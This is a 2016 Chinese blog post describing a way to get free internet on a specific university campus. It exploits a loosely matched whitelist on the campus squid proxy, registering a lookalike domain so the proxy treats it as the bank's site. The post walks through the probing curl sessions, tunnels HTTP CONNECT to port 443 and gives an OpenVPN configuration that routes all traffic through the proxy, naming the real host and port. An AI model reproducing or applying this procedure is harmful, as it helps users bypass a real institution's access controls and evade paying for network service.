次世代校园网免流

作者 Known Rabbit 日期 2016-12-26
次世代校园网免流

补一下最近发现的校园网免流方法。回想 CDN 的白名单漏洞,那个代理的使用方式可是多种多样呀,有一阵子我还用它绕过校园Wi-Fi的AP隔离呢(哈哈哈),似乎也是从我这里扩散出去的呢(哈哈哈)。自从它修补之后,最近几乎没有什么划算的免流方式可以少交那十几块钱了。这个代理虽然也支持http CONNECT,但使用方式很苛刻,随意开火吧。

简单讲一下发现过程和利用方式。

发现

这个代理是从网络中心博客上发现,为了“方便同学进行校园卡圈存签约”而架设的。猜测白名单里会有建行。命令行随便试了试。

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com.cn
* Rebuilt URL to: http://www.ccb.com.cn/
* Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com.cn/ HTTP/1.1
> Host: www.ccb.com.cn
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Date: Sun, 20 Nov 2016 14:50:19 GMT
< Server: Apache
< Accept-Ranges: bytes
< Cache-Control: max-age=0
< Expires: Sun, 20 Nov 2016 14:50:19 GMT
< Vary: Accept-Encoding,User-Agent
< Content-Length: 2060
< Content-Type: text/html; charset=UTF-8
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...
<div class="tips">
<div class="title"><img src="http://www.ccb.com/cn/img/jump/ico_tips.gif" />重要提示:</div>
<div class="text">为了保证您正常访问建设银行网站,请您输入<span><a href="http://www.ccb.com">www.ccb.com</a></span></div>
</div>
...

再看看匹配失败是啥样。

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.baidu.com
* Rebuilt URL to: http://www.baidu.com/
* Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.baidu.com/ HTTP/1.1
> Host: www.baidu.com
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 403 Forbidden
< Server: squid/3.3.8
< Mime-Version: 1.0
< Date: Sun, 20 Nov 2016 14:47:59 GMT
< Content-Type: text/html
< Content-Length: 3136
< X-Squid-Error: ERR_ACCESS_DENIED 0
< Vary: Accept-Language
< Content-Language: en
< X-Cache: MISS from proxy
< X-Cache-Lookup: NONE from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
...

很明显是个squid代理,端口也看得出来。

不过……唔……原来我写错域名了,不过这样的话,如果管理员写正则时候犯懒,估计会直接写成 *.ccb.com*

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com                             1 ↵
* Rebuilt URL to: http://www.ccb.com/
* Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com/ HTTP/1.1
> Host: www.ccb.com
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Date: Sun, 20 Nov 2016 14:49:11 GMT
< Server: Apache
< Accept-Ranges: bytes
< Cache-Control: max-age=0
< Expires: Sun, 20 Nov 2016 14:49:11 GMT
< Vary: Accept-Encoding
< Content-Length: 86
< Content-Type: text/html; charset=UTF-8
< Set-Cookie: BIGipServerccvcc_jt_197.1_80_web_pool=1361249034.20480.0000; path=/
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<SCRIPT LANGUAGE="JavaScript">
window.location="/cn/home/indexv3.html";
</SCRIPT>

利用

呵呵,那用我的域名来一发咯。用python开了个简单服务器,收一下请求。

all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com.rabit.pw:8080
* Rebuilt URL to: http://www.ccb.com.rabit.pw:8080/
* Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com.rabit.pw:8080/ HTTP/1.1
> Host: www.ccb.com.rabit.pw:8080
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Server: SimpleHTTP/0.6 Python/3.5.2
< Date: Sun, 20 Nov 2016 14:56:01 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 367
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="fucktyou">fucktyou</a></li>
<li><a href="go">go</a></li>
</ul>
<hr>
</body>
</html>
* Connection #0 to host proxy.neu.edu.cn left intact

OK了,那公网连接我们已经有了,再试试 http CONNECT tunnel,没有这个功能有漏洞也没啥大用。这里用mitmproxy对我刚才的 http.server 做了一下反代,端口不变

all_proxy=http://proxy.neu.edu.cn:3128 curl -v https://www.ccb
* Rebuilt URL to: https://www.ccb.com.rabit.pw:8080/
* Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
* Establish HTTP proxy tunnel to www.ccb.com.rabit.pw:8080
> CONNECT www.ccb.com.rabit.pw:8080 HTTP/1.1
> Host: www.ccb.com.rabit.pw:8080
> User-Agent: curl/7.43.0
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 403 Forbidden
< Server: squid/3.3.8

唔,,看来squid配置是可以选只允许connect哪个目标端口的。那就把我的端口映射到443。

all_proxy=http://proxy.neu.edu.cn:3128 curl -v https://www.ccb.com.rabit.pw
* Rebuilt URL to: https://www.ccb.com.rabit.pw/
* Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
* Establish HTTP proxy tunnel to www.ccb.com.rabit.pw:443
> CONNECT www.ccb.com.rabit.pw:443 HTTP/1.1
> Host: www.ccb.com.rabit.pw:443
> User-Agent: curl/7.43.0
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 Connection established
<
* Proxy replied OK to CONNECT request
* SSL certificate problem: Invalid certificate chain
* Closing connection 0
curl: (60) SSL certificate problem: Invalid certificate chain
More details here: http://curl.haxx.se/docs/sslcerts.html

OK,我们现在有了一个tcp 443端口的免费公网连接。接下来的利用就简单了嘛。在 www.ccb.com.your.domain:443 上,部署一个tcp协议的openvpn,用tun最好,然后在默认配置文件里加几行,就OK了。

http-proxy proxy.neu.edu.cn 3128
# 校内网段绕过代理
route 58.154.160.0 255.255.224.0 net_gateway
route 58.154.192.0 255.255.192.0 net_gateway
route 58.195.85.192 255.255.255.240 net_gateway
route 58.200.30.128 255.255.255.128 net_gateway
route 118.202.0.0 255.255.224.0 net_gateway
route 118.202.32.0 255.255.240.0 net_gateway
route 202.118.0.0 255.255.224.0 net_gateway
route 202.199.0.0 255.255.240.0 net_gateway
route 202.206.16.0 255.255.248.0 net_gateway
route 210.30.192.0 255.255.240.0 net_gateway
route 219.216.64.0 255.255.192.0 net_gateway
route 172.16.0.0 255.240.0.0 net_gateway

至于别的姿势,有用修改版的SS带个http头的,有tinyproxy加个伪header的,参考其他免流,自行开发咯~